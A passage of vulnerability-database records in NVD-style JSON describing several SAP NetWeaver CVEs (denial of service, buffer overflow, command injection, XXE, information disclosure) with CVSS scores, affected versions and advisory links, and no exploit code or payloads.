],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The Enqueue Server in SAP NetWeaver JAVA AS 7.1 through 7.4 allows remote attackers to cause a denial of service (process crash) via a crafted request, aka SAP Security Note 2258784."
},
{
"lang": "es",
"value": "El Enqueue Server en SAP NetWeaver JAVA AS 7.1 hasta la versi\u00f3n 7.4 permite a atacantes remotos causar una denegaci\u00f3n de servicio (ca\u00edda de proceso) a trav\u00e9s de una petici\u00f3n manipulada, tambi\u00e9n conocida como SAP Security Note 2258784."
}
],
"id": "CVE-2016-4015",
"lastModified": "2024-11-21T02:51:10.050",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": true,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-04-14T14:59:10.130",
"references": [
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-16-019-sap-netweaver-enqueue-server-dos-vulnerability/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-16-019-sap-netweaver-enqueue-server-dos-vulnerability/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2023-09-12 02:15
Modified
2024-11-21 08:21
Severity ?
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary
Due to missing authentication check in webdynpro application, an unauthorized user in SAP NetWeaver (Guided Procedures) - version 7.50, can gain access to admin view of specific function anonymously. On successful exploitation of vulnerability under specific circumstances, attacker can view user’s email address. There is no integrity/availability impact.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://me.sap.com/notes/3348142 | Permissions Required | |
| cna@sap.com | https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://me.sap.com/notes/3348142 | Permissions Required | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Due to missing authentication check in webdynpro application, an unauthorized user in SAP NetWeaver (Guided Procedures) - version 7.50, can gain access to admin view of specific function anonymously. On successful exploitation of vulnerability under specific circumstances, attacker can view user\u2019s email address. There is no integrity/availability impact.\n\n"
},
{
"lang": "es",
"value": "Debido a la falta de verificaci\u00f3n de autenticaci\u00f3n en la aplicaci\u00f3n webdynpro, un usuario no autorizado en SAP NetWeaver ((Guided Procedures) - versi\u00f3n 7.50, puede obtener acceso a la vista de administrador de la funci\u00f3n espec\u00edfica de forma an\u00f3nima. En la explotaci\u00f3n exitosa de la vulnerabilidad en circunstancias espec\u00edficas, el atacante puede ver la direcci\u00f3n de correo electr\u00f3nico del usuario. No hay impacto en la integridad/disponibilidad."
}
],
"id": "CVE-2023-41367",
"lastModified": "2024-11-21T08:21:10.173",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-09-12T02:15:12.733",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://me.sap.com/notes/3348142"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://me.sap.com/notes/3348142"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-306"
}
],
"source": "cna@sap.com",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-09-05 14:55
Modified
2024-11-21 02:14
Severity ?
Summary
Buffer overflow in disp+work.exe 7000.52.12.34966 and 7200.117.19.50294 in the Dispatcher in SAP NetWeaver 7.00 and 7.20 allows remote authenticated users to cause a denial of service or execute arbitrary code via unspecified vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"matchCriteriaId": "53B11A3B-C559-428C-8946-7FD9FFBFA1BC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in disp+work.exe 7000.52.12.34966 and 7200.117.19.50294 in the Dispatcher in SAP NetWeaver 7.00 and 7.20 allows remote authenticated users to cause a denial of service or execute arbitrary code via unspecified vectors."
},
{
"lang": "es",
"value": "Desbordamiento de buffer en disp+work.exe 7000.52.12.34966 y 7200.117.19.50294 en el distribuidor de la plataforma SAP NetWeaver 7.00 y 7.20 permite a usuarios remotos autenticados causar una denegaci\u00f3n de servicio o ejecutar c\u00f3digo arbitrario a trav\u00e9s de vectores no especificados."
}
],
"id": "CVE-2014-6252",
"lastModified": "2024-11-21T02:14:01.630",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-09-05T14:55:05.270",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"url": "http://secunia.com/advisories/60496"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-14-011-sap-netweaver-dispatcher-buffer-overflow-rce-dos/"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/96196"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/2018221"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://secunia.com/advisories/60496"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-14-011-sap-netweaver-dispatcher-buffer-overflow-rce-dos/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/96196"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/2018221"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2023-07-11 03:15
Modified
2024-11-21 08:10
Severity ?
9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
Due to programming error in function module and report, IS-OIL component in SAP ECC and SAP S/4HANA allows an authenticated attacker to inject an arbitrary operating system command into an unprotected parameter in a common (default) extension. On successful exploitation, the attacker can read or modify the system data as well as shut down the system.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://me.sap.com/notes/3350297 | Permissions Required | |
| cna@sap.com | https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://me.sap.com/notes/3350297 | Permissions Required | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:600:*:*:*:*:*:*:*",
"matchCriteriaId": "BDC771C8-70C7-4EA4-BF13-9153175F652F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:602:*:*:*:*:*:*:*",
"matchCriteriaId": "D95174DD-6513-469F-911D-61FEF490BF44",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:603:*:*:*:*:*:*:*",
"matchCriteriaId": "A78F0A5A-514B-49C6-82E1-788049D4624A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:604:*:*:*:*:*:*:*",
"matchCriteriaId": "92CF95AB-7222-4BB9-A01B-CC9BB0548DBE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:605:*:*:*:*:*:*:*",
"matchCriteriaId": "8941EEEA-F588-419D-A72C-177A669D450B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:606:*:*:*:*:*:*:*",
"matchCriteriaId": "94616B3E-ADE0-45E2-A3B8-B545E7E0BB0F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:617:*:*:*:*:*:*:*",
"matchCriteriaId": "345E8B05-AE80-401D-895D-918136E5D738",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:618:*:*:*:*:*:*:*",
"matchCriteriaId": "6B5038E3-5515-41C5-8C89-D839D5AE60DF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:800:*:*:*:*:*:*:*",
"matchCriteriaId": "4BE09533-102E-492F-ACAE-5B959885EE45",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:802:*:*:*:*:*:*:*",
"matchCriteriaId": "70FA0AC8-D377-4800-9365-2EAD15C108C9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:803:*:*:*:*:*:*:*",
"matchCriteriaId": "364A7BFE-3EAE-4897-B198-BEE1DCEB2163",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:804:*:*:*:*:*:*:*",
"matchCriteriaId": "2A119858-00D2-44CA-9C9D-9BEAFC8BD3CD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:805:*:*:*:*:*:*:*",
"matchCriteriaId": "5781D666-9439-4D4D-A0F6-DDA6763439CE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:806:*:*:*:*:*:*:*",
"matchCriteriaId": "19188AD7-2B5F-48E9-81B2-30A60F009432",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:807:*:*:*:*:*:*:*",
"matchCriteriaId": "5C4EDC18-FBD1-473C-82F8-940097CE8C1C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Due to programming error in function module and report, IS-OIL component in SAP ECC and SAP S/4HANA allows an authenticated attacker to inject an arbitrary operating system command into an unprotected parameter in a common (default) extension. \u00a0On successful exploitation, the attacker can read or modify the system data as well as shut down the system.\n\n"
}
],
"id": "CVE-2023-36922",
"lastModified": "2024-11-21T08:10:55.903",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-07-11T03:15:10.357",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://me.sap.com/notes/3350297"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://me.sap.com/notes/3350297"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "cna@sap.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-11-04 15:55
Modified
2024-11-21 02:19
Severity ?
Summary
Unspecified vulnerability in SAP Internet Communication Manager (ICM), as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via unknown vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"matchCriteriaId": "A9805246-77E5-456C-B7CF-07CFF2F9F069",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in SAP Internet Communication Manager (ICM), as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via unknown vectors."
},
{
"lang": "es",
"value": "Vulnerabilidad no especificada en SAP Internet Communication Manager (ICM), utilizado en SAP NetWeaver 7.02 y 7.3, permite a atacantes remotos causar una denegaci\u00f3n de servicio (terminaci\u00f3n de proceso) a trav\u00e9s de vectores desconocidos."
}
],
"id": "CVE-2014-8591",
"lastModified": "2024-11-21T02:19:23.870",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": true,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-11-04T15:55:07.777",
"references": [
{
"source": "cve@mitre.org",
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/71030"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-14-016-sap-netweaver-httpd-partial-http-post-requests-dos/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98582"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1966655"
},
{
"source": "cve@mitre.org",
"url": "https://twitter.com/SAP_Gsupport/status/524138333065449472"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/71030"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-14-016-sap-netweaver-httpd-partial-http-post-requests-dos/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98582"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1966655"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://twitter.com/SAP_Gsupport/status/524138333065449472"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2015-04-01 14:59
Modified
2024-11-21 02:28
Severity ?
Summary
The SAP Management Console in SAP NetWeaver 7.40 allows remote attackers to obtain sensitive information via the ReadProfile parameters, aka SAP Security Note 2091768.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The SAP Management Console in SAP NetWeaver 7.40 allows remote attackers to obtain sensitive information via the ReadProfile parameters, aka SAP Security Note 2091768."
},
{
"lang": "es",
"value": "La consola de gesti\u00f3n de SAP en SAP NetWeaver 7.40 permite a atacantes remotos obtener informaci\u00f3n sensible a trav\u00e9s de los par\u00e1metros ReadProfile, tambi\u00e9n conocido como la nota de seguridad de SAP 2091768."
}
],
"id": "CVE-2015-2817",
"lastModified": "2024-11-21T02:28:08.673",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2015-04-01T14:59:15.553",
"references": [
{
"source": "cve@mitre.org",
"url": "http://packetstormsecurity.com/files/132359/SAP-Management-Console-Information-Disclosure.html"
},
{
"source": "cve@mitre.org",
"url": "http://seclists.org/fulldisclosure/2015/Jun/65"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/535829/100/800/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/73705"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-15-007-sap-management-console-readprofile-parameters-information-disclosure/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://packetstormsecurity.com/files/132359/SAP-Management-Console-Information-Disclosure.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2015/Jun/65"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/535829/100/800/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/73705"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-15-007-sap-management-console-readprofile-parameters-information-disclosure/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-04-14 14:59
Modified
2024-11-21 02:51
Severity ?
Summary
XML external entity (XXE) vulnerability in the UDDI component in SAP NetWeaver JAVA AS 7.4 allows remote attackers to cause a denial of service (system hang) via a crafted DTD in an XML request to uddi/api/replication, aka SAP Security Note 2254389.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.4:*:*:*:java_as:*:*:*",
"matchCriteriaId": "8026745D-FDEA-4CC9-A26C-E408996E78F3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "XML external entity (XXE) vulnerability in the UDDI component in SAP NetWeaver JAVA AS 7.4 allows remote attackers to cause a denial of service (system hang) via a crafted DTD in an XML request to uddi/api/replication, aka SAP Security Note 2254389."
},
{
"lang": "es",
"value": "Vulnerabilidad de XXE en el componente UDDI en SAP NetWeaver JAVA AS 7.4 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (cuelgue del sistema) a trav\u00e9s de un DTD manipulado en una petici\u00f3n XML para uddi/api/replication, tambi\u00e9n conocido como SAP Security Note 2254389."
}
],
"evaluatorComment": "\u003ca href=\"http://cwe.mitre.org/data/definitions/611.html\"\u003eCWE-611: Improper Restriction of XML External Entity Reference (\u0027XXE\u0027)\u003c/a\u003e",
"id": "CVE-2016-4014",
"lastModified": "2024-11-21T02:51:09.900",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 8.5,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 4.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-04-14T14:59:09.147",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/137919/SAP-NetWeaver-AS-JAVA-7.4-XXE-Injection.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Jul/45"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-16-020-sap-netweaver-java-uddi-component-xxe-vulnerability/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/137919/SAP-NetWeaver-AS-JAVA-7.4-XXE-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Jul/45"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-16-020-sap-netweaver-java-uddi-component-xxe-vulnerability/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-01-09 15:29
Modified
2024-11-21 04:03
Severity ?
Summary
SAP NetWeaver, SAP BASIS from 7.00 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.52, contains code that allows you to execute arbitrary program code of the user's choice. A malicious user can therefore control the behaviour of the system or can potentially escalate privileges by executing malicious code without legitimate credentials.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | http://www.securityfocus.com/bid/102449 | Third Party Advisory, VDB Entry | |
| cna@sap.com | https://blogs.sap.com/2018/01/09/sap-security-patch-day-january-2018/ | Vendor Advisory | |
| cna@sap.com | https://launchpad.support.sap.com/#/notes/1906212 | Permissions Required | |
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2525392 | Permissions Required | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/102449 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://blogs.sap.com/2018/01/09/sap-security-patch-day-january-2018/ | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/1906212 | Permissions Required | |
